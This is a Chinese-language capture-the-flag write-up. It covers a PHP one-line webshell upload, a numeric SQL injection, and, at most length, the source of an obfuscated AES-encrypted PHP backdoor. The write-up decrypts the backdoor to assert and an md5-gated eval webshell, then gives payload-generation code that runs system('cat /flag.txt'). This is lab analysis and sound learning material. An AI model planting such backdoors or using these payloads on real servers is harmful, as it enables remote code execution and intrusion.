web
签到
略
web1
上传 php一句话木马
web2
sql 注入注入点在消息通知中,找到id参数。数字型注入直接找到order by 4
直接报错注入。
web3
web3 是唯一一道有难度的题目,可以看到一开始给了一个页面。显示的是一个系统代码被修改了。我们扫描目录扫描到wwwroot.zip。直接把系统源码下载下来。
其实我们仔细分析一下这个提示,他就说因为被篡改了所以说网站紧急关闭。同时把系统代码备份了。此时我们考虑如果说我们没有交互界面我们无法进行操作,那么肯定是有一些站点没有关闭。
遍历所有文件,发现只有一个文件返回了一个字符串,直接审计这个文件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| describedssTest.php
<?php error_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
function e($D, $K)
{
$cipher = 'aes-128-cbc';
$encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
$result = base64_encode($GLOBALS['v8'] . $encrypted);
$result = base64_encode($result);
return $result;
}
function d($D, $K)
{
$cipher = 'aes-128-cbc';
$decodedData = base64_decode(base64_decode($D));
$encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
$decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
return $decrypted;
}
$a8 = trim(d($a8, $p8));
ob_start();
$a8(trim(d($d8, $p8)));
$O = ob_get_contents();
ob_end_clean();
echo e($O, $p8); ?>
|
仔细分析一下逻辑,其实只看下面的一些语句, 就知道先 解密
1
2
|
$a8 并且解密出来是assert直接拼接执行,同时我们又解密是$d8,出来是一个木马。直接利用木马执行,里面需要注意eval每次只执行一层,同时需要注意'' 需要被\转义。同时需要注意20241026是md5两次才能等于3b7430adaed18facca7b799229138b7b
|
d8解密出来的木马
1
| @eval("if(md5(@\$_GET['id'])===\$p8){@eval(trim(d(\$_POST['d'],\$p8)));}")
|
payload生成
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| pherror_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
function e($D, $K)
{
$cipher = 'aes-128-cbc';
$encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
$result = base64_encode($GLOBALS['v8'] . $encrypted);
$result = base64_encode($result);
return $result;
}
function d($D, $K)
{
$cipher = 'aes-128-cbc';
$decodedData = base64_decode(base64_decode($D));
$encryptedData = substr($decodedData,
openssl_cipher_iv_length($cipher));
$decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
return $decrypted;
}
$a = "eval ('system(\'cat /flag.txt \');');";
echo $c = e($a, $p8);
?>
|
返回结果解密
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
<?php
$p8 = '3b7430adaed18facca7b799229138b7b';
$v8 = '0329647546905494';
function d($D, $K)
{
$cipher = 'aes-128-cbc';
$decodedData = base64_decode(base64_decode($D));
$encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
$decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
return $decrypted;
}
echo d("TURNeU9UWTBOelUwTmprd05UUTVOREZYVW1wMFpuUTFTblJyV1VGbVV6a3JOa042ZWs4MVQxSnNURWxUWTJoeWVYSlNaRU5GWmxGc2FHOVRVamwyY0hwQ2FXNVVTMEpSTkhoU00wczNXWFk9", $p8);
?>
|
misc
日志分析
直接搜索{
